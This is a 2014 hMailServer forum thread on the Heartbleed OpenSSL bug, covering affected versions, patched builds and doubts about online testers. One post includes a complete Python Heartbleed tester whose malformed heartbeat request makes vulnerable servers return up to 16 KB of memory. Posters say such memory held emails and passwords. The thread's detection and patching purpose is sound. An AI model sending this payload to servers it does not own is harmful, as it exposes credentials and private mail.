Heartbleed Bug in OpenSSL

yetanotherb
New user
Posts: 3
Joined: 2014-04-08 11:10

Heartbleed Bug in OpenSSL

Post by yetanotherb » 2014-04-08 11:15

Hi,

is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)

This is a VERY serious problem :-(

Best regards,
B

mlg.odk
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 12:19

Yes, hMailServer is vulnerable. Even worse, OpenSSL is statically linked, so there is no way for the end user to patch this until an official update is released.

I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.

yetanotherb
New user
Posts: 3
Joined: 2014-04-08 11:10

Re: Heartbleed Bug in OpenSSL

Post by yetanotherb » 2014-04-08 12:33

Oooh boy.... :shock: :(

martin
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 13:10

I will look into this and release a patch.

percepts
Senior user
Posts: 5282
Joined: 2009-10-20 16:33
Location: Sceptred Isle

Re: Heartbleed Bug in OpenSSL

Post by percepts » 2014-04-08 13:56

Reading the full information release and the link to openssl.org news release it seems there is an easy fix.
Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
What versions of the OpenSSL are affected?

Status of different versions:
•OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
•OpenSSL 1.0.1g is NOT vulnerable
•OpenSSL 1.0.0 branch is NOT vulnerable
•OpenSSL 0.9.8 branch is NOT vulnerable

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

SCOOBY
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 14:25

Hi,
Is there any way I can tell what version of OpenSSL my installation is using?
Cheers

mlg.odk
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 14:29

percepts wrote:Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
Unfortunately, this issue is not about certificates. It is an issue in the implementation of the TLS protocol. Long story short, it is currently possible for anyone, without authentication, to grab the passwords of any recently logged on users, their recently sent e-mails, or your cryptographic keys, over the internet and without leaving a trace. The only solution for this issue is to update hMailServer once a patch is out.

@martin: I am looking forward to the update.
SCOOBY wrote:Is there any way I can tell what version of OpenSSL my installation is using?
hMailServer 5.4 is using OpenSSL 1.0.1c.
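
As an added example (not hMailServer's code), here is a check a practitioner can run locally instead of trusting a remote tester. Because hMailServer links OpenSSL statically, the library's version banner (of the form "OpenSSL 1.0.1c 10 May 2012") is embedded in hMailServer.exe and can simply be scanned for, then matched against the affected-version list from the openssl.org advisory quoted later in this thread. The default install path, the banner regex and the idea of pointing it at the OpenSSL DLLs for a dynamically linked build are assumptions.

```python
#!/usr/bin/env python3
"""Report which OpenSSL is baked into an hMailServer binary and whether it is Heartbleed-affected.

Added example for this thread, not hMailServer code. OpenSSL keeps its version
banner ("OpenSSL 1.0.1c 10 May 2012") as a string constant in libcrypto, and
that string survives static linking, so scanning hMailServer.exe (or the
OpenSSL DLLs of a dynamically linked build) shows the linked version without
running the server or trusting a remote test.
"""
import re
import sys

# Banner format: "OpenSSL <major>.<minor>.<fix><letter> <day> <Mon> <year>"
BANNER_RE = re.compile(rb"OpenSSL (\d+\.\d+\.\d+[a-z]?(?:-fips)?) +\d{1,2} [A-Z][a-z]{2} \d{4}")

# Assumed default install location; pass a path on the command line to override.
DEFAULT_BINARY = r"C:\Program Files (x86)\hMailServer\Bin\hMailServer.exe"


def find_openssl_versions(data):
    """Distinct OpenSSL versions whose banner occurs in `data` (bytes), in order of appearance."""
    found = []
    for m in BANNER_RE.finditer(data):
        version = m.group(1).decode("ascii")
        if version not in found:
            found.append(version)
    return found


def heartbleed_status(version):
    """Classify per the openssl.org advisory quoted in this thread:
    1.0.1 through 1.0.1f are vulnerable, 1.0.1g is fixed, 1.0.0 and 0.9.8 never had the bug."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]?)(?:-fips)?", version)
    if not m:
        return "unknown"
    branch = tuple(int(m.group(i)) for i in (1, 2, 3))
    if branch != (1, 0, 1):
        return "not affected"
    return "VULNERABLE" if m.group(4) < "g" else "fixed"   # "" < "a" < ... < "f" < "g"


def scan_binary(path):
    """Return [(version, status), ...] for every OpenSSL banner found in the file at `path`."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [(v, heartbleed_status(v)) for v in find_openssl_versions(data)]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_BINARY
    results = scan_binary(target)
    if not results:
        print(f"{target}: no OpenSSL banner found (not linked, or strings stripped/compressed)")
    for version, status in results:
        print(f"{target}: OpenSSL {version} -> {status}")
```

Two caveats: a packed or string-stripped executable hides the banner, and a build that loads OpenSSL from DLLs carries the banner in the DLL rather than in hMailServer.exe, so scan whichever file actually contains libcrypto.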

martin
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 14:33

I sent a security newsletter a while back informing users about this issue.

Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.

SCOOBY
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 14:35

Thanks, eagerly awaiting the update!

Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?

martin
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 14:39

If you don't have TCP/IP ports, then OpenSSL isn't executed within hMailServer so then it should not be vulnerable.

Greta
Senior user
Posts: 306
Joined: 2007-01-02 13:23

Re: Heartbleed Bug in OpenSSL

Post by Greta » 2014-04-08 19:07

From what version does hMailServer use OpenSSL 1.0.1?

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 19:18

2014-04-08 5.4-B2014040801
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Updated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.0.1g & incorporated into this build.

http://www.hmailserver.com/forum/viewto ... 10&t=21420

EDIT:
Also posted a non-statically linked build so OpenSSL DLLs can be used if needed. Obviously weird things can happen if you use incompatible DLLs, so know what you are doing & only use it if needed.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

SCOOBY
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 19:59

Sorry if I'm being dense, but where do I download it from?

mlg.odk
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 19:59

Thanks Bill48105, I can confirm that this update resolves the issue.

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:03

SCOOBY wrote:Sorry if I'm being dense, but where do I download it from?
You go to the experimental thread:
http://www.hmailserver.com/forum/viewto ... 10&t=21420
Scroll WAYYY down to where the downloads are:

NEWEST & MOST RECENT:
=== 8Apr2014 === (BASED on official 5.4 B1950 + to-date experimental changes)
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
NOTE: Should be stable but not recommended live on production until tested further

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:05

mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill

mlg.odk
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 20:14

Bill48105 wrote:
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:22

mlg.odk wrote:
Bill48105 wrote:
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).
OK cool thx. Yup it claims it's ok now. Assuming it is true it's good then eh.

SCOOBY
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 20:29

Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?

martin
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 20:42

Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:46

martin wrote:Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.
SCOOBY wrote:Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?
Luc from IRC tested before & after with the python script & claims it reported vulnerable before & OK after.
If anyone else wants to test:
https://gist.github.com/sh1n0b1/10100394

RvdH
Senior user
Posts: 803
Joined: 2008-06-27 14:42
Location: Netherlands

Re: Heartbleed Bug in OpenSSL

Post by RvdH » 2014-04-08 20:47

heartbleedtest.py

```python
#!/usr/bin/env python3

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

# Modified for simplified checking by Yonathan Klijnsma
# (Python 2 original; ported to Python 3 here, detection logic unchanged.)

import struct
import socket
import time
import select
from optparse import OptionParser

target = None

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    """Turn the whitespace-separated hex dumps below into raw bytes."""
    return bytes.fromhex(x.replace(' ', '').replace('\n', ''))

# TLS 1.1 ClientHello (record type 0x16, version 03 02) offering a long cipher
# list and, at the very end, the heartbeat extension (00 0f 00 01 01).
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat record (type 0x18): a request (01) claiming a 0x4000-byte payload
# while the record carries no payload bytes at all. A vulnerable server copies
# 16384 bytes of whatever follows the request in memory into its reply.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    """Hex/ASCII dump of a reply. Not used by the check itself; handy for inspecting leaked data."""
    for b in range(0, len(s), 16):
        lin = s[b:b + 16]
        hxdat = ' '.join('%02X' % c for c in lin)
        pdat = ''.join((chr(c) if 32 <= c <= 126 else '.') for c in lin)
        print('  %04x: %-48s %s' % (b, hxdat, pdat))
    print()

def recvall(s, length, timeout=5):
    """Read exactly `length` bytes, or return None on EOF or timeout."""
    endtime = time.time() + timeout
    rdata = b''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    """Read one TLS record; returns (content type, version, payload)."""
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
    return typ, ver, pay

def hit_hb(s):
    """Send the malformed heartbeat and judge the server by its first reply record."""
    global target
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            # Connection closed or timed out: a patched server silently drops the request.
            print(target + '|NOT VULNERABLE')
            return False

        if typ == 24:
            # Heartbeat response: anything beyond the 3-byte header is leaked memory.
            if len(pay) > 3:
                print(target + '|VULNERABLE')
            else:
                print(target + '|NOT VULNERABLE')
            return True

        if typ == 21:
            # Alert record: the server rejected the request.
            print(target + '|NOT VULNERABLE')
            return False

def main():
    global target
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((args[0], opts.port))
    target = args[0]
    s.send(hello)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return
        # Look for the server hello done message before sending the heartbeat.
        if typ == 22 and pay[0] == 0x0E:
            break

    hit_hb(s)

if __name__ == '__main__':
    main()
```
usage:
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465
CIDR to RegEx: d-fault.nl/CIDRtoRegEx
DNS Lookup: d-fault.nl/DNSTools
DNSBL Lookup: d-fault.nl/DNSBLLookup
GEOIP Lookup: d-fault.nl/GeoipLookup

sowen
New user
Posts: 7
Joined: 2012-11-10 22:59

Re: Heartbleed Bug in OpenSSL

Post by sowen » 2014-04-08 20:47

http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:49

sowen wrote:http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
That's not looking good in terms of trusting that test.. Did you try the python script?

lucb1e
New user
Posts: 3
Joined: 2014-02-22 02:04

Re: Heartbleed Bug in OpenSSL

Post by lucb1e » 2014-04-08 20:57

I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching which said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 21:01

lucb1e wrote:I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching which said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Thanks for the info. I'd sooner say not to trust that site at this point. Maybe a bug, maybe not designed to test mail or maybe they are a front to gather info about vulnerable servers. :o

martin
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 21:30

There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 21:32

martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.

yetanotherb
New user
Posts: 3
Joined: 2014-04-08 11:10

Re: Heartbleed Bug in OpenSSL

Post by yetanotherb » 2014-04-08 21:40

Great Job!

Thanks a lot for the fast response!

Best regards,
B

SCOOBY
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 22:04

Thanks guys, server patched and hopefully that is that!!

sowen
New user
Posts: 7
Joined: 2012-11-10 22:59

Re: Heartbleed Bug in OpenSSL

Post by sowen » 2014-04-08 22:17

This tester reports the patched version as not vulnerable:
http://possible.lv/tools/hb/?sp

Thanks!

mattg
Moderator
Posts: 20218
Joined: 2007-06-14 05:12
Location: 'The Outback' Australia

Re: Heartbleed Bug in OpenSSL

Post by mattg » 2014-04-08 23:05

Bill48105 wrote:
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 23:36

mattg wrote:
Bill48105 wrote:
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?
martin is moving away from the SVN repo in favor of GitHub. He had set up a 'dev' one there a while back but I stuck with SVN until I was able to get my local copy cleaned up enough to commit. I've just not had time. Now martin is setting up a new copy on GitHub and setting up automated builds. Should help keep them in sync.

So long story short only my builds have a lot of the recent 'experimental' changes until I can get them to martin so he can approve & merge with his but no ETA
Bill

Sune
Normal user
Posts: 59
Joined: 2005-09-21 20:11
Location: Denmark

Re: Heartbleed Bug in OpenSSL

Post by Sune » 2014-04-08 23:54

Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).

japi
New user
Posts: 27
Joined: 2011-06-12 14:09
Location: Germany

Re: Heartbleed Bug in OpenSSL

Post by japi » 2014-04-09 01:11

martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Martin,
I want to thank you (and of course everyone who contributed!) for your quick reaction.
This is a level of service I would expect from a company, but not from a small project (most companies would most likely not react as fast as you did!).
The last 24 hours weren't the brightest in the history of the internet, but hMailServer and many other open-source projects have done a great job in mitigating the most severe incident I can remember in the past 7 years. It was the sysadmin's nightmare come true, every SSL port an enemy.
It's time to get some sleep, now that the Heartbleeding has stopped... :mrgreen:
Thanks a Million and keep up the great work!

Best Regards,
Jan

Kob
New user
Posts: 15
Joined: 2005-10-01 13:02

Re: Heartbleed Bug in OpenSSL

Post by Kob » 2014-04-10 19:30

For what it's worth, I found out that the on-line testing at
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io

Caspar
Senior user
Posts: 377
Joined: 2008-09-08 11:47

Re: Heartbleed Bug in OpenSSL

Post by Caspar » 2014-04-11 10:54

That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server, update now to the latest stable or experimental build (whichever you need, because of specific options). After you have done that, create a new certificate since the private key could have been compromised.
Steps on how to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
If you have strange problems or errors use the log analyzer! http://log.damnation.org.uk
Join us on IRC! http://hmailserver.com/irc_fullscreen.php

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-11 18:50

Caspar wrote:That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
The python scripts above work. I tested them with hmail.

Caspar
Senior user
Posts: 377
Joined: 2008-09-08 11:47

Re: Heartbleed Bug in OpenSSL

Post by Caspar » 2014-04-14 10:05

Bill48105 wrote:
Caspar wrote:...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.

Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-14 10:40

Caspar wrote:
Bill48105 wrote:
Caspar wrote:...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
Yeah I hadn't tested it on a non-SSL port but guess that makes sense since the handshake hasn't completed yet on a STARTTLS-enabled port, although it is an SSL socket even before the handshake. But if one wants to test, just test SSL & if it's OK, STARTTLS ports would be too unless someone proves otherwise.
Bill

esc
New user
Posts: 1
Joined: 2014-04-30 15:09

Re: Heartbleed Bug in OpenSSL

Post by esc » 2014-04-30 15:15

Sune wrote:Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
I would also like a definitive answer to this.

percepts
Senior user
Posts: 5282
Joined: 2009-10-20 16:33
Location: Sceptred Isle

Re: Heartbleed Bug in OpenSSL

Post by percepts » 2014-04-30 15:46


Bill48105
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-30 17:50

Version 5.3.3 - Build 1879 (2010-06-06) - Production

Issue 312: In some cases, the POP3 server returned incorrect data which could lead to corrupt attachments. Changes have been made to prevent this error. The error was apparent when retrieving PDF files which had been sent using Outlook Express.
Issue 313: If hMailServer was configured to download messages from a server which did not support UIDL, hMailServer timed out. hMailServer has been changed to disconnect immediately and report an error when this happens. The External account functionality in hMailServer does not work with POP3 servers not supporting UIDL.
Issue 314: If DKIM was enabled and a user sent an email with no text in the body, hMailServer did not correctly sign the message.
Issue 1879: OpenSSL has been upgraded to version 0.9.8o.
